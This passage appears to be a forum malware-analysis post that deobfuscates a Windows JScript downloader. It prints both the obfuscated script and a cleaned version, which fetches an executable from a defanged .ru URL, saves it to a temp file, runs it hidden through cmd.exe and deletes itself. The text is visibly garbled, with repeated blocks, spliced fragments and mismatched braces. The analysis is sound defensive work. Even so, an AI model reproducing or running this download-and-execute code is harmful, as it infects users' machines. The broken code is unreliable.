return fwycobzot["zikumo"];
}
function ifag3() {
var bcevu3 = [];
bcevu3["unwebi"] = "opvabobr";
bcevu3["yttife"] = "jytu";
bcevu3["ypafa"] = 'pija';
bcevu3["akvatdilu"] = "g.Fi";
bcevu3["yldujoxxy"] = 'ukys';
return bcevu3["akvatdilu"];
}
function ewunta() {
var hfibotyf = [];
hfibotyf["aphecy"] = "dtobubta";
hfibotyf["sejoji"] = 'ksiniha';
hfibotyf["konaw"] = 'n';
hfibotyf["yweheto"] = "ytitxyzj";
return hfibotyf["konaw"];
}
function xoxsebmyf() {
var nigkykh8 = [];
nigkykh8["lpivihemg"] = "oqozmes";
nigkykh8["ohawqy"] = 'xekmobze';
nigkykh8["ansycij"] = 'lde';
nigkykh8["edyguwf"] = 'ujazgotj';
return nigkykh8["ansycij"];
}
function anpig() {
var ubpifm = ["28322", "83101", "gsughe", "qlebsog", "18788", "gam", "uvyldob", "iczihdo", "72024", "blatzu"]
return ubpifm[5];
}
function yfvirz6() {
var qwykygid6 = [];
qwykygid6["obumg"] = 'ujkehfy';
qwykygid6["yszagr"] = "cm";
qwykygid6["coxca"] = "zwivov";
return qwykygid6["yszagr"];
}
function jtujekofq3() {
var kmexrajy0 = [];
kmexrajy0["intyjsabz"] = "cgafsacy";
kmexrajy0["epquku"] = "bsokhuny";
kmexrajy0["bqiwysme"] = "B.";
kmexrajy0["hnipdenpe"] = "asutjig";
return kmexrajy0["bqiwysme"];
}
function jutu0() {
var zucna = [etnivwoqze[6] + jarxid[1] + wxavi4[1] + ekzodi9() + shyjabesp[2], "jnahhopjef", "64635"]
return zucna[0];
}
function isiqku2() {
var xmoty = [];
xmoty["nelpoqjez"] = "typud";
xmoty["siqi"] = gakahy[5] + wleno5() + zululmudb6();
xmoty["znidtysi"] = "byvmy";
xmoty["lecuzo"] = "sorxobo";
return xmoty["siqi"];
}
function amjugaxqa8() {
var zciqli4 = [];
zciqli4["uwep"] = "gmigex";
zciqli4["iqube"] = "feboqda";
zciqli4["swytyt"] = ycharara6[5] + qkanutfujt();
zciqli4["dyjunw"] = "vkomvi";
return zciqli4["swytyt"];
}
var dazfeb = [];
dazfeb["uboxyre"] = 'reqetdo';
dazfeb["nukjojg"] = "awetlowf";
dazfeb["dywxissy"] = "esi";
return dazfeb["dywxissy"];
}
function izyq0() {
var ewydsuh6 = [];
ewydsuh6["pyzezgahz"] = "stem";
ewydsuh6["egdive"] = 'yzywbo';
ewydsuh6["alebo"] = "ycamm";
ewydsuh6["odmijibx"] = 'ajevisz';
ewydsuh6["jakonbajn"] = 'ilit';
return ewydsuh6["pyzezgahz"];
}
function zbyxizi5() {
var jahifa = [];
jahifa["icacy"] = 'izval';
jahifa["cbegeqsa"] = "wor";
jahifa["adfajawa"] = "some";
jahifa["ivgijgo"] = "uhvyhy";
return jahifa["cbegeqsa"];
}
function elbixaqt() {
var owid7 = [];
owid7["tutdidub"] = 'udrucsav';
owid7["logebi"] = "ru/";
owid7["orobedz"] = "hyduxx";
owid7["imlarre"] = 'epappe';
owid7["ybqyvhezu"] = "uvydhajq";
return owid7["logebi"];
}
function apoljojk() {
var tzywe = ["ifon", "86894", "67475", "67879", "axvosvutr", "taliqh", "obrypsi", "51213", "nt", "33043"]
return tzywe[8];
}
function ubwydbupc() {
var fwycobzot = [];
fwycobzot["yjsulonwu"] = "fmica";
fwycobzot["vvoqxo"] = 'eruqh';
fwycobzot["hurbujt"] = "jlekxehk";
fwycobzot["ysexn"] = "sibdisti";
fwycobzot["zikumo"] = "Na";
return fwycobzot["zikumo"];
}
function ifag3() {
var bcevu3 = [];
bcevu3["unwebi"] = "opvabobr";
bcevu3["yttife"] = "jytu";
bcevu3["ypafa"] = 'pija';
bcevu3["akvatdilu"] = "g.Fi";
bcevu3["yldujoxxy"] = 'ukys';
return bcevu3["akvatdilu"];
}
function ewunta() {
var hfibotyf = [];
hfibotyf["aphecy"] = "dtobubta";
hfibotyf["sejoji"] = 'ksiniha';
hfibotyf["konaw"] = 'n';
hfibotyf["yweheto"] = "ytitxyzj";
return hfibotyf["konaw"];
}
function xoxsebmyf() {
var nigkykh8 = [];
nigkykh8["lpivihemg"] = "oqozmes";
nigkykh8["ohawqy"] = 'xekmobze';
nigkykh8["ansycij"] = 'lde';
nigkykh8["edyguwf"] = 'ujazgotj';
return nigkykh8["ansycij"];
}
function anpig() {
var ubpifm = ["28322", "83101", "gsughe", "qlebsog", "18788", "gam", "uvyldob", "iczihdo", "72024", "blatzu"]
return ubpifm[5];
}
function yfvirz6() {
var qwykygid6 = [];
qwykygid6["obumg"] = 'ujkehfy';
qwykygid6["yszagr"] = "cm";
qwykygid6["coxca"] = "zwivov";
return qwykygid6["yszagr"];
}
function jtujekofq3() {
var kmexrajy0 = [];
kmexrajy0["intyjsabz"] = "cgafsacy";
kmexrajy0["epquku"] = "bsokhuny";
kmexrajy0["bqiwysme"] = "B.";
kmexrajy0["hnipdenpe"] = "asutjig";
return kmexrajy0["bqiwysme"];
}
function jutu0() {
var zucna = [etnivwoqze[6] + jarxid[1] + wxavi4[1] + ekzodi9() + shyjabesp[2], "jnahhopjef", "64635"]
return zucna[0];
}
function isiqku2() {
var xmoty = [];
xmoty["nelpoqjez"] = "typud";
xmoty["siqi"] = gakahy[5] + wleno5() + zululmudb6();
xmoty["znidtysi"] = "byvmy";
xmoty["lecuzo"] = "sorxobo";
return xmoty["siqi"];
}
function amjugaxqa8() {
var zciqli4 = [];
zciqli4["uwep"] = "gmigex";
zciqli4["iqube"] = "feboqda";
zciqli4["swytyt"] = ycharara6[5] + qkanutfujt();
zciqli4["dyjunw"] = "vkomvi";
return zciqli4["swytyt"];
}
try {
var eqnok2 = myjcigkab6;
if (!eqnok2[culalgo[2] + cuqqywn0[1] + fzerutu() + apoljojk() + ihdynkiri[0]][ubwydbupc() + lerzabhab() + gipertug9()][gatkyx5() + mywoxd() + ubyxs[7]]) {
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
var vihtew9 = bygpufo[0] + osubcy0[1] + jtujekofq3() + ivugniva9() + oveghuqj[3] + nbepxebo7();
var uglahup = tpexpon[2] + irifwid2() + ukebt[3] + fojjynb9[6] + ibekh() + tixqa3[3] + kyfduhp9();
var azjod = new siga88(vihtew9);
var urrigucx = new siga88(wjerco);
var opcakco = new siga88(uglahup);
var uffyvqo = qbijyc() + tfirsek[0] + sbogewob0[1] + zbyxizi5() + isqadozve5() + elgybqe0() + ahuxaju3[2] + anpig() + ogxetjowy() + nolyf[3] + elbixaqt() + tokoful8() + vcyqkarj9[0] + enyrzo[3] + ikirsime0() + enibji[3];
var mysfefyg = eqnok2[tubvy()];
azjod[yxubuhu()]();
var areglaly8 = igubijbi8() + pyjxu() + utes1() + unolodx() + momvyze() + urepwi() + fkuwyqu[0];
azjod[lymuvh()] = spudni0[4] - idnyfij8[2];
opcakco[ackogyngu()](socjyhlom0() + ovuz[0], uffyvqo, unaca[0] - unafme[3]);
var yzysa = urrigucx[hwontyna()](buvtyhe[1] - 776) + uxardykv5[0] + urrigucx[yretby5()]();
azjod[hojy3()] = ytuzzy4[7] - 635;
opcakco[ydugo0()]();
var imytalir = yfvirz6() + yduv[8] + gewyhvy5() + ybufbedu4() + lires() + irdulxy6() + yzysa;
if (opcakco[lsexnukmojn5()] == psyqmomabc[5] - 599) {
urrigucx[zaddeqpa0()](mysfefyg);
} catch (yhvuhnybu2) {}if (!eqnok2[culalgo[2] + cuqqywn0[1] + fzerutu() + apoljojk() + ihdynkiri[0]][ubwydbupc() + lerzabhab() + gipertug9()][gatkyx5() + mywoxd() + ubyxs[7]]) {
var siga88 = eval(qonijac[0] + usyl() + focvaq0[5] + miqypce2[6] + adefhi9() + ucynucji0[1] + wsycli9());
}var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
var vihtew9 = bygpufo[0] + osubcy0[1] + jtujekofq3() + ivugniva9() + oveghuqj[3] + nbepxebo7();
var uglahup = tpexpon[2] + irifwid2() + ukebt[3] + fojjynb9[6] + ibekh() + tixqa3[3] + kyfduhp9();
var azjod = new siga88(vihtew9);
var urrigucx = new siga88(wjerco);
var opcakco = new siga88(uglahup);
var uffyvqo = qbijyc() + tfirsek[0] + sbogewob0[1] + zbyxizi5() + isqadozve5() + elgybqe0() + ahuxaju3[2] + anpig() + ogxetjowy() + nolyf[3] + elbixaqt() + tokoful8() + vcyqkarj9[0] + enyrzo[3] + ikirsime0() + enibji[3];
var mysfefyg = eqnok2[tubvy()];
azjod[yxubuhu()]();
var areglaly8 = igubijbi8() + pyjxu() + utes1() + unolodx() + momvyze() + urepwi() + fkuwyqu[0];
azjod[lymuvh()] = spudni0[4] - idnyfij8[2];
opcakco[ackogyngu()](socjyhlom0() + ovuz[0], uffyvqo, unaca[0] - unafme[3]);
var yzysa = urrigucx[hwontyna()](buvtyhe[1] - 776) + uxardykv5[0] + urrigucx[yretby5()]();
azjod[hojy3()] = ytuzzy4[7] - 635;
opcakco[ydugo0()]();
var imytalir = yfvirz6() + yduv[8] + gewyhvy5() + ybufbedu4() + lires() + irdulxy6() + yzysa;
if (opcakco[lsexnukmojn5()] == psyqmomabc[5] - 599) {
var zofa1 = new siga88(areglaly8);
azjod[jwesifr0()](opcakco[hogkevitm0()]);
azjod[jutu0()](yzysa);
azjod[isiqku2()]();
zofa1[amjugaxqa8()](imytalir, unaca[0] - unafme[3]);
}azjod[jwesifr0()](opcakco[hogkevitm0()]);
azjod[jutu0()](yzysa);
azjod[isiqku2()]();
zofa1[amjugaxqa8()](imytalir, unaca[0] - unafme[3]);
urrigucx[zaddeqpa0()](mysfefyg);
In fact, all the deobfuscation has to begin with this part. All other vars and functions are only here to retrieve the goods strings.
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
=> var wjerco = "Scri" +"ptin" + "g.Fi" + "leSy" + "stem" + "Obje" + "ct";
=> var wjerco = "Scripting.FileSystemObject";
All deobfuscation can be made the same way
3) Deobuscated Version :
try {
var oStream = new ActiveXObject("ADODB.Stream");
// object to put the response content from request
var oFso = new ActiveXObject("Scripting.FileSystemObject");
// object to manipulate path / file name
var oHttp = new ActiveXObject("MSXML2.XMLHTTP");
// object to make the http request and Save the file on HD
var url = "hxxp://reworder.adultgamesite.ru/js/boxun4.exe"; // ACCESS DENIED BY KTS (CLOUD)
var script_path_file = WScript.ScriptFullName;
// the full path of the current running script
oStream.Open();
oStream.Position = 0 ;
oHttp.Open("GET", url, 0);
// request
var temp_file_path = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
//random name - example : %TEMP%\radCB3AD.tmp
oStream.Type = 1;
oHttp.send();
var cmd_line = "cmd.exe /c " + temp_file_path;
if (oHttp.Status == 200) {
oFso.deleteFile(script_path_file); // scripted file removed
} catch (e) {}// object to put the response content from request
var oFso = new ActiveXObject("Scripting.FileSystemObject");
// object to manipulate path / file name
var oHttp = new ActiveXObject("MSXML2.XMLHTTP");
// object to make the http request and Save the file on HD
var url = "hxxp://reworder.adultgamesite.ru/js/boxun4.exe"; // ACCESS DENIED BY KTS (CLOUD)
var script_path_file = WScript.ScriptFullName;
// the full path of the current running script
oStream.Open();
oStream.Position = 0 ;
oHttp.Open("GET", url, 0);
// request
var temp_file_path = oFso.GetSpecialFolder(2) + "\\" + oFso.GetTempName();
//random name - example : %TEMP%\radCB3AD.tmp
oStream.Type = 1;
oHttp.send();
var cmd_line = "cmd.exe /c " + temp_file_path;
if (oHttp.Status == 200) {
var oShell = new ActiveXObject("WScript.Shell");
oStream.Write(oHttp.ResponseBody);
oStream.SaveToFile(temp_file_path);
oStream.Close();
oShell.run(cmd_line, 0 );
// payload is run
}oStream.Write(oHttp.ResponseBody);
oStream.SaveToFile(temp_file_path);
oStream.Close();
oShell.run(cmd_line, 0 );
// payload is run
oFso.deleteFile(script_path_file); // scripted file removed
4) Conclusion about obfuscation method used :
What could appear "difficult", can be in real "easy", just have to well make a look at the whole script to find the good steps for deobfuscation.
5) Conclusion :
Deobfuscation of the downloader script can shows urls, methods, paths used, cmd, registry, , UAC bypassing method, etc ..., and also if a parameter has to be used => it then allows the dynamical analysis of the payload only.
Here, no parameter found.
After reported on VirusTotal, the analysis has shown no encrypting behavior :
the payload seems to be aware if it is run in a protected environment (VM, etc)
(see the spoiler part at the beginning)
(Don't hesitate to look at my previous analyzes, I try to analysis each time different methods of obfuscation, and their 'updates')
Last edited:
